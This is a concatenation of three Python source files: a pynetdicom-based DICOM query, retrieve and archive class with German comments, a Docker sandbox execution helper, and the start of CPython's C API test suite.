"Context" : cx.abstract_syntax,
"SCP_role" : cx.as_scp,
"SCU_role" : cx.as_scu
})
obj["associations"].append( associations )
return obj
def handle_EVENT(self, event):
"""Event Verarbeitung
sendet in evt_handlers definierte events über signal weiter
Parameters
----------
event : pynetdicom.evt
Ein von pynetdicom gesendeter event.
Returns
-------
None.
"""
logger.info('dicomClass.handle_EVENT: {}'.format( event.event.name ) )
signal( 'dicom.{}'.format( event.event.name ) ).send( {
"name": event.event.name,
"event": event,
"status":0x0000,
"msg":""
} )
def handle_STORE(self, event ):
"""Handle a C-STORE request event.
Dicom Daten empfangen und speichern
https://pydicom.github.io/pynetdicom/stable/reference/status.html
Status Codes: C-MOVE related - 0xC500 to 0xC5FF
Parameters
----------
event : TYPE
DESCRIPTION.
Returns
-------
status : hex
- 0x0000 - alles OK
- 0xC511 - Unhandled exception raised by the handler bound to evt.EVT_C_MOVE
- 0xC512
"""
logger.debug('dicomClass.handle_STORE')
ds = event.dataset
context = event.context
status = 0x0000
# determine where the DICOM data is stored
local_path = osp.join( self.dicomPath, self.subPath )
# create it if necessary
if not os.path.isdir( local_path ):
logger.debug('dicomClass.handle_STORE: creating subdir={}'.format( local_path ) )
os.makedirs( local_path )
# check whether the file already exists
exists, filename = self.archive_hasSOPInstanceUID( ds.SOPInstanceUID )
logger.debug( "dicomClass.handle_STORE: {}".format( ds.SOPInstanceUID + ".dcm" ) )
msg = ""
# write the DICOM data
if not exists or self.override:
# how the image data is to be interpreted
ds.is_little_endian = True
ds.is_implicit_VR = True
# save the file
# write_like_original=False to write a proper DICOM file
try:
ds.save_as( filename , write_like_original=False )
msg = "File saved: {}".format( filename )
except IOError as e: # pragma: no cover
# 0xC511 - Unhandled exception raised by the user’s implementation of the on_c_move callback
status = 0xC511
msg = "io_error: {}".format( str(e) )
logger.warning( "dicomClass.handle_STORE(io_error) [{}]: {}".format(status, filename ) )
except: # pragma: no cover
status = 0xC512
msg = "io_error: {}".format( filename )
logger.warning( "dicomClass.handle_STORE(save_error) [{}]: {}".format(status, filename ) )
else: # pragma: no cover
logger.debug( "Datei vorhanden: {}".format( filename ) )
msg = "Datei vorhanden: {}".format( filename )
logger.debug( "dicomClass.handle_STORE: {}".format( ds.SOPInstanceUID + ".dcm" ) )
signal( 'dicom.EVT_C_STORE' ).send( {
"name": event.event.name,
"_is_cancelled": False,
"dataset":ds,
"status":status,
"msg":msg
} )
return status
def echo(self):
"""
https://github.com/pydicom/pynetdicom/issues/419
Returns
-------
None.
"""
from pynetdicom.sop_class import VerificationSOPClass
#debug_logger()
# Initialise the Application Entity
ae = AE( ae_title=self.config.dicom[self.server]["aet"] )
ae.add_requested_context(VerificationSOPClass)
# qr_addr: the IP address of the QR SCP, as `str`
# qr_port: the port that the QR SCP is listening on as `int`
assoc = ae.associate(
addr = self.config.dicom[self.server]['server_ip'],
port = self.config.dicom[self.server]['server_port']
)
if assoc.is_established:
status = assoc.send_c_echo()
print( "status", status )
assoc.release()
else:
print( "not established")
def query( self, ds=None ):
"""Führt eine DICOM Abfrage durch.
Parameters
----------
ds : Dataset
Dataset für die Suche und Rückgabe. The default is None.
Returns
-------
results : list
gefundene daten
status : hex
Rückgabecode von send_c_find::
C-FIND related - 0xC300 to 0xC3FF
Zusätzlich:
- 0xC3F1 - keine PatientID
- 0xC0FF - initAE: Verbindung fehlgeschlagen
"""
results = []
if not ds: # pragma: no cover
logger.warning("dicomClass.query: no Dataset")
return results, 0xC3F1
# establish the connection if necessary
if not self.assoc:
status = self.initAE()
# and check it
if not self.assoc: # pragma: no cover
#print("dicomClass.query: connection failed")
logger.warning("dicomClass.query: connection failed")
return results, status
logger.warning("dicomClass.query: performing the query")
# perform the query
responses = self.assoc.send_c_find(
ds,
query_model=PatientRootQueryRetrieveInformationModelFind
)
# evaluate the responses
for (response_status, rds) in responses:
# determine the status code
status = 0xC3F3
if response_status:
status = response_status.Status
# depending on the status
if status in (0xFF00, 0xFF01) and rds:
# If the status is 'Pending' then `identifier` is the C-FIND response
results.append( rds )
elif status == 0x0000:
# the query completed successfully
# print("identifier:", identifier)
pass
else: # pragma: no cover
#print('dicomClass.query: Connection timed out, was aborted or received invalid response: 0x{0:04x}'.format( status ))
logger.warning('dicomClass.query: Connection timed out, was aborted or received invalid response: 0x{0:04x}'.format( status ) )
return results, status
def PATIENT( self, query:dict={} ):
"""Führt eine suche nach PATIENT durch.
Wie query mit einem default Dataset
Parameters
----------
query : dict, optional
query parameter für ds. The default is {}.
Returns
-------
results : list
gefundene daten
status : hex
Rückgabecode von send_c_find::
"""
ds_model = dicomQueryDefaults["PATIENT"].copy()
ds_model.update( query )
ds = Dataset()
for name, value in ds_model.items():
ds.__setattr__(name, value)
# Abfrage durchführen
return self.query( ds )
def STUDY( self, query:dict={} ):
"""Führt eine suche nach STUDY durch.
Wie query mit einem default Dataset
Parameters
----------
query : dict, optional
query parameter für ds. The default is {}.
Returns
-------
results : list
gefundene daten
status : hex
Rückgabecode von send_c_find::
"""
ds_model = dicomQueryDefaults["PATIENT"].copy()
ds_model.update( dicomQueryDefaults["STUDY"] )
ds_model.update( query )
ds = Dataset()
for name, value in ds_model.items():
ds.__setattr__(name, value)
# Abfrage durchführen
return self.query( ds )
def SERIES( self, query:dict={} ):
"""Führt eine suche nach SERIES durch.
Wie query mit einem default Dataset
Parameters
----------
query : dict, optional
query parameter für ds. The default is {}.
Returns
-------
results : list
gefundene daten
status : hex
Rückgabecode von send_c_find::
"""
ds_model = dicomQueryDefaults["PATIENT"].copy()
ds_model.update( dicomQueryDefaults["STUDY"] )
ds_model.update( dicomQueryDefaults["SERIES"] )
ds_model.update( query )
ds = Dataset()
for name, value in ds_model.items():
ds.__setattr__(name, value)
# Abfrage durchführen
return self.query( ds )
def IMAGE( self, query:dict={} ):
"""Führt eine suche nach IMAGE durch.
Wie query mit einem default Dataset
Parameters
----------
query : dict, optional
query parameter für ds. The default is {}.
Returns
-------
results : list
gefundene daten
status : hex
Rückgabecode von send_c_find::
"""
ds_model = dicomQueryDefaults["PATIENT"].copy()
ds_model.update( dicomQueryDefaults["STUDY"] )
ds_model.update( dicomQueryDefaults["SERIES"] )
ds_model.update( dicomQueryDefaults["IMAGE"] )
ds_model.update( query )
ds = Dataset()
for name, value in ds_model.items():
ds.__setattr__(name, value)
# Abfrage durchführen
return self.query( ds )
def _retrieve( self, PatientID:str=None,
StudyInstanceUID:str=None,
SeriesInstanceUID:str=None,
SOPInstanceUID:str=None,
override:bool=False,
subPath:str="",
ds=None
):
'''Fetch DICOM datasets from the server.
Parameters
----------
PatientID : str, optional
A patient ID. The default is None.
StudyInstanceUID : str, optional
A StudyInstanceUID. The default is None.
SeriesInstanceUID : str, optional
A SeriesInstanceUID. The default is None.
SOPInstanceUID : str, optional
A SOPInstanceUID. The default is None.
override : bool, optional
Fetch the data from the server again instead of using the local archive.
Used by getdicom.py, where it is set to False. The default is False.
subPath : str, optional
Appends subPath to the local storage location.
ds : Dataset, optional
Use this Dataset instead of PatientID, StudyInstanceUID, SeriesInstanceUID or SOPInstanceUID.
evt_handlers
------------
EVT_C_STORE
EVT_REJECTED
EVT_ACCEPTED
EVT_ABORTED
Signals
-------
dicom.EVT_C_STORE
Returns
-------
status : Dicom Status
- 0x0000 - data available/read | load archive | run EVT_C_STORE
- 0xC5F1 - no PatientID
- 0xC0FF - initAE: connection failed
- 0xC512 -
- 0xC515 - Address/Port already in use
'''
# remember the override flag
self.override = override
# remember subPath
self.subPath = subPath
if not ds:
# Create our Identifier (query) dataset
ds = Dataset()
# at which level the query should be performed
#ds.QueryRetrieveLevel = 'SERIES'
if PatientID:
ds.QueryRetrieveLevel = 'PATIENT'
# Unique key for PATIENT level
ds.PatientID = PatientID
# Unique key for STUDY level
if StudyInstanceUID:
ds.QueryRetrieveLevel = 'STUDY'
ds.StudyInstanceUID = str(StudyInstanceUID)
# Unique key for SERIES
if SeriesInstanceUID:
ds.QueryRetrieveLevel = 'SERIES'
ds.SeriesInstanceUID = str(SeriesInstanceUID)
# Unique key for IMAGE
if SOPInstanceUID:
ds.QueryRetrieveLevel = 'IMAGE'
ds.SOPInstanceUID = str(SOPInstanceUID)
ds.Modality = 'RTIMAGE'
# print( "do - retreive ds:\n", ds)
# log the QueryRetrieveLevel
logger.debug( "dicomClass._retrieve: QueryRetrieveLevel {}".format( ds.QueryRetrieveLevel ) )
# at IMAGE level, try to read from the file archive instead of fetching from the server
# fixme - when SOPInstanceUID is given instead of QueryRetrieveLevel
if hasattr(ds, 'SOPInstanceUID') and ds.SOPInstanceUID is not None and not override:
#if ds.QueryRetrieveLevel == 'IMAGE' and not override:
# info
logger.debug( "dicomClass._retrieve: search archive {}".format( ds.SOPInstanceUID ) )
# load the file from the archive
instance = self.archive_loadSOPInstanceUID( ds.SOPInstanceUID )
# if it could be read we are done here
if instance:
logger.debug( "dicomClass._retrieve: load archive {}".format( ds.SOPInstanceUID ) )
signal( 'dicom.EVT_C_STORE').send( {
"name": "EVT_C_STORE",
'_is_cancelled': False,
"status":0x0000,
"msg" : "load archive",
"dataset": instance, # Dataset mitgeben (fertig)
} )
return 0x0000
else:
logger.info( "dicomClass._retrieve: no archive {}".format( ds.SOPInstanceUID ) )
#
# ansonsten wird hier versucht neu zu laden
#
status = self._start_server("EVT_C_STORE")
if status != 0x0000:
return status
# print( "dicomClass.assoc.send_c_xxx", self.assoc.is_established, self.scp, self.assoc )
# without try/except
'''
convert PSO to UID
- ``P`` - 1.2.840.10008.5.1.4.1.2.1.2 -
*Patient Root Information Model - MOVE*
- ``S`` - 1.2.840.10008.5.1.4.1.2.2.2 -
*Study Root Information Model - MOVE*
- ``O`` - 1.2.840.10008.5.1.4.1.2.3.2 -
*Patient Study Only Information Model - MOVE*
'''
# Retrieve Error
result = 0xC512
responses = None
self.messageId += 1
if self.request_mode == "c_get":
query_model = StudyRootQueryRetrieveInformationModelGet
if self.request_query_model == "P":
query_model= PatientRootQueryRetrieveInformationModelGet
elif self.request_query_model == "O":
query_model= PatientStudyOnlyQueryRetrieveInformationModelGet
# perform c_get
if self.assoc.is_established:
responses = self.assoc.send_c_get(
ds,
query_model = query_model,
msg_id = self.messageId
)
else:
print( "dicomClass._retrieve send_c_get(): assoc is not established" )
else:
query_model = StudyRootQueryRetrieveInformationModelMove
if self.request_query_model == "P":
query_model= PatientRootQueryRetrieveInformationModelMove
elif self.request_query_model == "O":
query_model= PatientStudyOnlyQueryRetrieveInformationModelMove
# perform c_move
if self.assoc.is_established:
responses = self.assoc.send_c_move(
ds,
self.config.dicom[self.server]['aet'],
query_model = query_model,
msg_id = self.messageId
)
else:
print( "dicomClass._retrieve send_c_move(): assoc is not established" )
if responses:
i = 0
for (status, identifier) in responses:
i += 1
if status:
result = status.Status
logger.debug( 'dicomClass._retrieve: {} - C-MOVE query status: {}'.format( i, hex(result) ) )
# If the status is 'Pending' then the identifier is the C-MOVE response
# Pending
# | ``0xFF00`` - Sub-operations are continuing
# the rest of the flow is handled by retrieve_thread
if status.Status in (0xFF00, 0xFF01):
if identifier:
print( "dicomClass._retrieve: 0xFF00, 0xFF01", identifier )
pass
elif status.Status == 0x0000:
if identifier:
print( "dicomClass._retrieve: 0x0000", identifier)
pass
elif status.Status == 0xc002:
# User’s callback implementation returned an invalid status object (not a pydicom Dataset or an int)
if identifier:
print( "dicomClass._retrieve: 0xc002", identifier)
elif status.Status in (0xC511, 0xC512):
logger.error( "dicomClass._retrieve: Fehler beim speichern der DICOM Daten" )
if identifier:
print( "dicomClass._retrieve 0xC511", identifier)
# 0xB000 -Warning - Sub-operations complete, one or more or warnings
else:
# Association._wrap_get_move_responses
# print("Connection timed out", responses )
logger.warning('dicomClass._retrieve - Connection timed out, was aborted or received invalid response')
else:
pass
logger.debug("dicomClass._retrieve: DICOM Daten holen: {} - {}".format( hex(result), SOPInstanceUID ) )
# wenn nicht pending (retrieve_thread übernimmt) EVT_C_STORE mit _is_cancelled senden
# 0xff00 - Pending
# 0x0000 - Success
if not result in ( 0x0000, 0xff00):
signal( 'dicom.EVT_C_STORE').send( {
"name": "EVT_C_STORE",
"_is_cancelled": True,
"status": result,
"hex": hex(result),
"msg": "run EVT_C_STORE"
} )
return result
def archive_hasSOPInstanceUID(self, SOPInstanceUID):
"""Prüft ob eine SOPInstanceUID schon im File Archiv vorhanden ist
Parameters
----------
SOPInstanceUID : TYPE
Eine SOPInstanceUID.
Returns
-------
exists : bool
Datei vorhanden oder nicht.
filename : str
Der geprüfte Dateiname
"""
filename = osp.join( self.dicomPath, self.subPath, SOPInstanceUID + ".dcm" )
return os.path.isfile( filename ), filename
def archive_loadSOPInstanceUID( self, SOPInstanceUID ):
"""Lädt eine Dicomdatei mit SOPInstanceUID aus dem Archiv
Parameters
----------
SOPInstanceUID : str
Eine SOPInstanceUID.
Returns
-------
ds : TYPE
DESCRIPTION.
"""
ds = None
exists, filename = self.archive_hasSOPInstanceUID( SOPInstanceUID )
if exists:
try:
# read with force=True so the file can be read even if header data is missing
ds = dcmread(filename, force=True)
except: # pragma: no cover
# catch all other errors
logger.error("Error reading the DICOM file")
pass
return ds
def archive_deleteSOPInstanceUID(self, SOPInstanceUID):
"""Löscht ein Dataset aus dem File Archiv.
Parameters
----------
SOPInstanceUID : TYPE
Eine SOPInstanceUID.
Returns
-------
filename : str
Der entfernte Dateiname
"""
exists, filename = self.archive_hasSOPInstanceUID( SOPInstanceUID )
if exists:
os.remove( filename )
return filename
def retrieve( self, params={} ):
"""Holt DICOM Daten mit threading und event Benachrichtigung.
Ruft _retrieve mit den Parametern auf
suchen nach
Received unexpected C-MOVE service message in pynetdicom Association _serve_request
aufgerufen von _run_reactor
Parameters
----------
params : dict, optional
DESCRIPTION. The default is {}.
Returns
-------
instances : list
gefundene Dataset Instances.
signals: list
"""
instances = []
signals = []
result_available = threading.Event()
mq = queue.Queue()
def _C_STORE( signal ):
signals.append(signal)
if signal["_is_cancelled"] == True:
# Vorgang abbrechen
result_available.set()
elif signal["_is_cancelled"] == False:
if "dataset" in signal:
# Ergebnis setzen und abbrechen
instances.append( signal["dataset"] )
result_available.set()
def _RELEASED( signal ):
signals.append( signal )
result_available.set()
def _REJECTED( signal ):
signals.append( signal )
result_available.set()
def _ABORTED( signal ):
signals.append( signal )
result_available.set()
signal( 'dicom.EVT_C_STORE' ).connect( _C_STORE )
signal( 'dicom.EVT_REJECTED' ).connect( _REJECTED )
signal( 'dicom.EVT_RELEASED' ).connect( _RELEASED )
signal( 'dicom.EVT_ABORTED' ).connect( _ABORTED )
# run as a thread; the return value of _retrieve can be fetched via mq.get()
thread = threading.Thread( target=lambda q, args: q.put( self._retrieve( **args ) ), args=( mq, params ) )
thread.start()
# cancel the operation after at most 10 seconds
while not result_available.wait( timeout=10 ):
result_available.set()
return instances, signals
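# --- Usage sketch (not part of the original class; illustrative only) ---
# One hedged way to drive ispDicom end to end: a C-FIND at SERIES level for a
# patient, followed by a retrieve of the first series found. "config" is
# assumed to be the project's configuration object that provides the
# ["dicom"][<server>] settings (aet, aec, server_ip, server_port, listen_port,
# local_dir, request_mode, request_query_model) used by the class above.
def _example_fetch_first_series( config, patient_id, server="VMSDBD" ):
    dicom = ispDicom( server=server, config=config )
    instances = []
    try:
        results, status = dicom.SERIES( { "PatientID": patient_id } )
        if status == 0x0000 and results:
            series_uid = getattr( results[0], "SeriesInstanceUID", None )
            if series_uid:
                # retrieve() blocks briefly and returns the received datasets
                instances, signals = dicom.retrieve( { "SeriesInstanceUID": str(series_uid) } )
    finally:
        dicom.closeAE()
    return instances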
|
docker.py
|
# -*- encoding: utf-8 -*-
from __future__ import nested_scopes, generators, division, absolute_import, \
with_statement, print_function, unicode_literals
import logging
from subprocess import Popen, PIPE
from strings import get_random_string
import io
import threading
import subprocess
log = logging.getLogger(__name__)
BUF_SIZE = 4096
LIMIT_BYTES = 10 * 1024 * 1024
def kill_and_remove(ctr_name):
for action in ('kill', 'rm'):
p = Popen('docker %s %s' % (action, ctr_name), shell=True,
stdout=PIPE, stderr=PIPE)
if p.wait() != 0:
log.warning(p.stderr.read())
# raise RuntimeError()
def limited_reader(fn_in, fn_out, limit_bytes):
fn = io.open(fn_in.fileno(), encoding="utf-8")
read_bytes = 0
truncated = False
try:
while True:
buf = fn.read(BUF_SIZE)
if len(buf) == 0:
break
if read_bytes >= limit_bytes and not truncated:
fn_out.write("\nTRUNCATED\n")
truncated = True
read_bytes += len(buf)
if not truncated:
fn_out.write(buf)
except Exception as e:
fn_out.write("Error while read or write proccess output: {}".format(e))
def execute(cmd, user="nobody", cwd=None, timeout=None, network='none',
memory_limit=str('1024m'),
image='ubuntu:14.04', volumes=None, name_prefix=''):
if not isinstance(cmd, list):
raise TypeError('cmd argument is not a list')
if volumes is not None and not isinstance(volumes, list):
raise TypeError('volumes argument is not a list')
if timeout is not None and not isinstance(timeout, (float, int)):
raise TypeError('timeout argument is not a float')
if memory_limit is not None:
if not isinstance(memory_limit, str):
raise TypeError('memory_limit argument is not a str')
if not memory_limit or memory_limit[-1] not in 'bkmg':
raise ValueError('memory_limit argument invalid (use '
'<number><unit> format, where unit can be one of '
'b, k, m, or g)')
if cwd is None:
cwd = '/'
name = get_random_string()
command = []
if timeout:
# timeout docker run
command += ['timeout', '-k', str(timeout + 3), str(timeout + 2)]
command += ['docker', 'run', '--rm', '--name', name_prefix + name]
if network != 'bridge':
command += ['--net', network]
if user != 'root':
command += ['-u', user]
if cwd != '/':
command += ['-w', cwd]
if volumes:
for v in volumes:
command += ['-v', v]
if memory_limit:
command += ['-m', memory_limit]
command += [image]
if timeout:
# timeout in docker run
command += ['timeout', '-k', str(timeout + 1), str(timeout)]
logging.info("Will run: %s", command + cmd)
p = subprocess.Popen(command + cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = io.StringIO()
t1 = threading.Thread(target=limited_reader, args=(p.stdout, output, LIMIT_BYTES))
t2 = threading.Thread(target=limited_reader, args=(p.stderr, output, LIMIT_BYTES))
t1.start()
t2.start()
t1.join()
t2.join()
p.wait()
status = p.returncode
output = output.getvalue()
is_timeout = status == -9 or status == 124
if status == -9: # Happens on timeout
# We have to kill the container since it still runs
# detached from Popen and we need to remove it after because
# --rm is not working on killed containers
kill_and_remove(name)
return status == 0 and not is_timeout, status, is_timeout, output
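# --- Usage sketch (illustrative only) ---
# Assumes a local Docker daemon, the 'ubuntu:14.04' image and the coreutils
# 'timeout' binary on the host; the command and limits are made-up values.
def _example_run_sandboxed():
    ok, status, is_timeout, output = execute(
        ['bash', '-c', 'echo hello from the sandbox'],
        user='nobody',
        timeout=10,
        network='none',
        memory_limit='256m',
        image='ubuntu:14.04',
        name_prefix='sandbox_',
    )
    return ok, output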
|
test_capi.py
|
# Run the _testcapi module tests (tests for the Python/C API): by defn,
# these are all functions _testcapi exports whose name begins with 'test_'.
from collections import OrderedDict
import os
import pickle
import random
import re
import subprocess
import sys
import textwrap
import threading
import time
import unittest
import weakref
from test import support
from test.support import MISSING_C_DOCSTRINGS
from test.support.script_helper import assert_python_failure, assert_python_ok
try:
import _posixsubprocess
except ImportError:
_posixsubprocess = None
# Skip this test if the _testcapi module isn't available.
_testcapi = support.import_module('_testcapi')
# Were we compiled --with-pydebug or with #define Py_DEBUG?
Py_DEBUG = hasattr(sys, 'gettotalrefcount')
def testfunction(self):
"""some doc"""
return self
class InstanceMethod:
id = _testcapi.instancemethod(id)
testfunction = _testcapi.instancemethod(testfunction)
class CAPITest(unittest.TestCase):
def test_instancemethod(self):
inst = InstanceMethod()
self.assertEqual(id(inst), inst.id())
self.assertTrue(inst.testfunction() is inst)
self.assertEqual(inst.testfunction.__doc__, testfunction.__doc__)
self.assertEqual(InstanceMethod.testfunction.__doc__, testfunction.__doc__)
InstanceMethod.testfunction.attribute = "test"
self.assertEqual(testfunction.attribute, "test")
self.assertRaises(AttributeError, setattr, inst.testfunction, "attribute", "test")
def test_no_FatalError_infinite_loop(self):
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import _testcapi;'
'_testcapi.crash_no_current_thread()'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
(out, err) = p.communicate()
self.assertEqual(out, b'')
# This used to cause an infinite loop.
self.assertTrue(err.rstrip().startswith(
b'Fatal Python error:'
b' PyThreadState_Get: no current thread'))
def test_memoryview_from_NULL_pointer(self):
self.assertRaises(ValueError, _testcapi.make_memoryview_from_NULL_pointer)
def test_exc_info(self):
raised_exception = ValueError("5")
new_exc = TypeError("TEST")
try:
raise raised_exception
except ValueError as e:
tb = e.__traceback__
orig_sys_exc_info = sys.exc_info()
orig_exc_info = _testcapi.set_exc_info(new_exc.__class__, new_exc, None)
new_sys_exc_info = sys.exc_info()
new_exc_info = _testcapi.set_exc_info(*orig_exc_info)
reset_sys_exc_info = sys.exc_info()
self.assertEqual(orig_exc_info[1], e)
self.assertSequenceEqual(orig_exc_info, (raised_exception.__class__, raised_exception, tb))
self.assertSequenceEqual(orig_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(reset_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(new_exc_info, (new_exc.__class__, new_exc, None))
self.assertSequenceEqual(new_sys_exc_info, new_exc_info)
else:
self.assertTrue(False)
@unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
def test_seq_bytes_to_charp_array(self):
# Issue #15732: crash in _PySequence_BytesToCharpArray()
class Z(object):
def __len__(self):
return 1
self.assertRaises(TypeError, _posixsubprocess.fork_exec,
1,Z(),3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17)
# Issue #15736: overflow in _PySequence_BytesToCharpArray()
class Z(object):
def __len__(self):
return sys.maxsize
def __getitem__(self, i):
return b'x'
self.assertRaises(MemoryError, _posixsubprocess.fork_exec,
1,Z(),3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17)
@unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
def test_subprocess_fork_exec(self):
class Z(object):
def __len__(self):
return 1
# Issue #15738: crash in subprocess_fork_exec()
self.assertRaises(TypeError, _posixsubprocess.fork_exec,
Z(),[b'1'],3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17)
@unittest.skipIf(MISSING_C_DOCSTRINGS,
"Signature information for builtins requires docstrings")
def test_docstring_signature_parsing(self):
self.assertEqual(_testcapi.no_docstring.__doc__, None)
self.assertEqual(_testcapi.no_docstring.__text_signature__, None)
self.assertEqual(_testcapi.docstring_empty.__doc__, None)
self.assertEqual(_testcapi.docstring_empty.__text_signature__, None)
self.assertEqual(_testcapi.docstring_no_signature.__doc__,
"This docstring has no signature.")
self.assertEqual(_testcapi.docstring_no_signature.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_invalid_signature.__doc__,
"docstring_with_invalid_signature($module, /, boo)\n"
"\n"
"This docstring has an invalid signature."
)
self.assertEqual(_testcapi.docstring_with_invalid_signature.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_invalid_signature2.__doc__,
"docstring_with_invalid_signature2($module, /, boo)\n"
"\n"
"--\n"
"\n"
"This docstring also has an invalid signature."
)
self.assertEqual(_testcapi.docstring_with_invalid_signature2.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_signature.__doc__,
"This docstring has a valid signature.")
self.assertEqual(_testcapi.docstring_with_signature.__text_signature__, "($module, /, sig)")
self.assertEqual(_testcapi.docstring_with_signature_but_no_doc.__doc__, None)
self.assertEqual(_testcapi.docstring_with_signature_but_no_doc.__text_signature__,
"($module, /, sig)")
self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__doc__,
"\nThis docstring has a valid signature and some extra newlines.")
self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__text_signature__,
"($module, /, parameter)")
def test_c_type_with_matrix_multiplication(self):
M = _testcapi.matmulType
m1 = M()
m2 = M()
self.assertEqual(m1 @ m2, ("matmul", m1, m2))
self.assertEqual(m1 @ 42, ("matmul", m1, 42))
self.assertEqual(42 @ m1, ("matmul", 42, m1))
o = m1
o @= m2
self.assertEqual(o, ("imatmul", m1, m2))
o = m1
o @= 42
self.assertEqual(o, ("imatmul", m1, 42))
o = 42
o @= m1
self.assertEqual(o, ("matmul", 42, m1))
def test_c_type_with_ipow(self):
# When the __ipow__ method of a type was implemented in C, using the
# modulo param would cause segfaults.
o = _testcapi.ipowType()
self.assertEqual(o.__ipow__(1), (1, None))
self.assertEqual(o.__ipow__(2, 2), (2, 2))
def test_return_null_without_error(self):
# Issue #23571: A function must not return NULL without setting an
# error
if Py_DEBUG:
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.return_null_without_error()
""")
rc, out, err = assert_python_failure('-c', code)
self.assertRegex(err.replace(b'\r', b''),
br'Fatal Python error: a function returned NULL '
br'without setting an error\n'
br'Python runtime state: initialized\n'
br'SystemError: <built-in function '
br'return_null_without_error> returned NULL '
br'without setting an error\n'
br'\n'
br'Current thread.*:\n'
br' File .*", line 6 in <module>')
else:
with self.assertRaises(SystemError) as cm:
_testcapi.return_null_without_error()
self.assertRegex(str(cm.exception),
'return_null_without_error.* '
'returned NULL without setting an error')
def test_return_result_with_error(self):
# Issue #23571: A function must not return a result with an error set
if Py_DEBUG:
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.return_result_with_error()
""")
rc, out, err = assert_python_failure('-c', code)
self.assertRegex(err.replace(b'\r', b''),
br'Fatal Python error: a function returned a '
br'result with an error set\n'
br'Python runtime state: initialized\n'
br'ValueError\n'
br'\n'
br'The above exception was the direct cause '
br'of the following exception:\n'
br'\n'
br'SystemError: <built-in '
br'function return_result_with_error> '
br'returned a result with an error set\n'
br'\n'
br'Current thread.*:\n'
br' File .*, line 6 in <module>')
else:
with self.assertRaises(SystemError) as cm:
_testcapi.return_result_with_error()
self.assertRegex(str(cm.exception),
'return_result_with_error.* '
'returned a result with an error set')
def test_buildvalue_N(self):
_testcapi.test_buildvalue_N()
def test_set_nomemory(self):
code = """if 1:
import _testcapi
class C(): pass
# The first loop tests both functions and that remove_mem_hooks()
# can be called twice in a row. The second loop checks a call to
# set_nomemory() after a call to remove_mem_hooks(). The third
# loop checks the start and stop arguments of set_nomemory().
for outer_cnt in range(1, 4):
start = 10 * outer_cnt
for j in range(100):
if j == 0:
if outer_cnt != 3:
_testcapi.set_nomemory(start)
else:
_testcapi.set_nomemory(start, start + 1)
try:
C()
except MemoryError as e:
if outer_cnt != 3:
_testcapi.remove_mem_hooks()
print('MemoryError', outer_cnt, j)
_testcapi.remove_mem_hooks()
break
"""
rc, out, err = assert_python_ok('-c', code)
self.assertIn(b'MemoryError 1 10', out)
self.assertIn(b'MemoryError 2 20', out)
self.assertIn(b'MemoryError 3 30', out)
def test_mapping_keys_values_items(self):
class Mapping1(dict):
def keys(self):
return list(super().keys())
def values(self):
return list(super().values())
def items(self):
return list(super().items())
class Mapping2(dict):
def keys(self):
return tuple(super().keys())
def values(self):
return tuple(super().values())
def items(self):
return tuple(super().items())
dict_obj = {'foo': 1, 'bar': 2, 'spam': 3}
for mapping in [{}, OrderedDict(), Mapping1(), Mapping2(),
dict_obj, OrderedDict(dict_obj),
Mapping1(dict_obj), Mapping2(dict_obj)]:
self.assertListEqual(_testcapi.get_mapping_keys(mapping),
list(mapping.keys()))
self.assertListEqual(_testcapi.get_mapping_values(mapping),
list(mapping.values()))
self.assertListEqual(_testcapi.get_mapping_items(mapping),
list(mapping.items()))
def test_mapping_keys_values_items_bad_arg(self):
self.assertRaises(AttributeError, _testcapi.get_mapping_keys, None)
self.assertRaises(AttributeError, _testcapi.get_mapping_values, None)
self.assertRaises(AttributeError, _testcapi.get_mapping_items, None)
class BadMapping:
def keys(self):
return None
def values(self):
return None
def items(self):
return None
bad_mapping = BadMapping()
self.assertRaises(TypeError, _testcapi.get_mapping_keys, bad_mapping)
self.assertRaises(TypeError, _testcapi.get_mapping_values, bad_mapping)
self.assertRaises(TypeError, _testcapi.get_mapping_items, bad_mapping)
@unittest.skipUnless(hasattr(_testcapi, 'negative_refcount'),
'need _testcapi.negative_refcount')
def test_negative_refcount(self):
# bpo-35059: Check that Py_DECREF() reports the correct filename
# when calling _Py_NegativeRefcount() to abort Python.
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.negative_refcount()
""")
rc, out, err = assert_python_failure('-c', code)
self.assertRegex(err,
br'_testcapimodule\.c:[0-9]+: '
br'_Py_NegativeRefcount: Assertion failed: '
br'object has negative ref count')
def test_trashcan_subclass(self):
# bpo-35983: Check that the trashcan mechanism for "list" is NOT
# activated when its tp_dealloc is being called by a subclass
from _testcapi import MyList
L = None
for i in range(1000):
L = MyList((L,))
@support.requires_resource('cpu')
def test_trashcan_python_class1(self):
self.do_test_trashcan_python_class(list)
@support.requires_resource('cpu')
def test_trashcan_python_class2(self):
from _testcapi import MyList
self.do_test_trashcan_python_class(MyList)
def do_test_trashcan_python_class(self, base):
# Check that the trashcan mechanism works properly for a Python
# subclass of a class using the trashcan (this specific test assumes
# that the base class "base" behaves like list)
class PyList(base):
# Count the number of PyList instances to verify that there is
# no memory leak
num = 0
def __init__(self, *args):
__class__.num += 1
super().__init__(*args)
def __del__(self):
__class__.num -= 1
for parity in (0, 1):
L = None
# We need in the order of 2**20 iterations here such that a
# typical 8MB stack would overflow without the trashcan.
for i in range(2**20):
L = PyList((L,))
L.attr = i
if parity:
# Add one additional nesting layer
L = (L,)
self.assertGreater(PyList.num, 0)
del L
self.assertEqual(PyList.num, 0)
def test_subclass_of_heap_gc_ctype_with_tpdealloc_decrefs_once(self):
class HeapGcCTypeSubclass(_testcapi.HeapGcCType):
def __init__(self):
self.value2 = 20
super().__init__()
